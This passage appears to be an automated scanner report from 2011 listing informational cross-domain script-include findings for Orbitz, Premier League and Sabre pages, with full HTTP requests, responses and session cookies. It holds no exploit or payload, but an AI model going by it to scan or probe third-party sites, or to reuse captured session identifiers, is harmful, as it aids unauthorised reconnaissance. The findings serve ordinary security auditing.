Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:24:10 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA2MDM3OTd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToxMDowMyBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:10:03 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:10:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:04 GMT
Content-Length: 249175


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
20.93. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
20.94. http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Headlines/0,,12306~2466648,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Headlines/0,,12306~2466648,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; tabPreferences5102=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.4.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/SearchResults%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Headlines/0%25252C%25252C12306%25257E2466648%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:51:22 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:58:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:01 GMT
Content-Length: 67785
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows02 at 03 10 2011 00:51:22 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.95. http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Headlines/0,,12306~2469333,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Headlines/0,,12306~2469333,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.1.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:42:52 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 65408
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows04 at 03 10 2011 00:42:52 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.96. http://www.premierleague.com/page/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Home HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/SearchResults%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Headlines/0%25252C%25252C12306%25257E2466648%25252C00.html%2526ot%253DA; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.5.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:49:30 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:58:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:09 GMT
Content-Length: 178226
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows02 at 03 10 2011 00:49:30 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div class="HTMLElement">
<script type="text/javascript" src="http://www.premierleague.premiumtv.co.uk/staticFiles/f6/9b/0,,~39926,00.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.97. http://www.premierleague.com/page/Home/0,,12306,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Home/0,,12306,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Home/0,,12306,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:39:49 GMT
Content-Type: text/html
Content-Length: 178226
Vary: Accept-Encoding
Cache-Control: max-age=10
Date: Sun, 02 Oct 2011 23:48:52 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:39:48 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div class="HTMLElement">
<script type="text/javascript" src="http://www.premierleague.premiumtv.co.uk/staticFiles/f6/9b/0,,~39926,00.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.98. http://www.premierleague.com/page/Players/0,,12306,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/Players/0,,12306,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/Players/0,,12306,00.html HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.2.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Headlines%2526pidt%253D1%2526oid%253Dhttp%25253A//www.premierleague.com/page/Players/0%25252C%25252C12306%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Mon, 03 Oct 2011 00:18:37 GMT
Content-Type: text/html
Expires: Sun, 02 Oct 2011 23:50:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:23 GMT
Content-Length: 81832
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows04 at 03 10 2011 00:28:37 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.99. http://www.premierleague.com/page/SearchResults/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/SearchResults/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.3.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Players%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520document.getElementById%252528%252527categorySearchForm%252527%252529.submit%252528%252529%25257D%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Expires: Sun, 02 Oct 2011 23:53:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:53:13 GMT
Content-Length: 60029
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:53:13 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
20.100. http://www.sabrehospitality.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17374


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
20.101. http://www.sabrehospitality.com/hotel-distribution-systems.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /hotel-distribution-systems.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel-distribution-systems.php HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:56 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14629


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
20.102. http://www.sabretravelnetwork.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
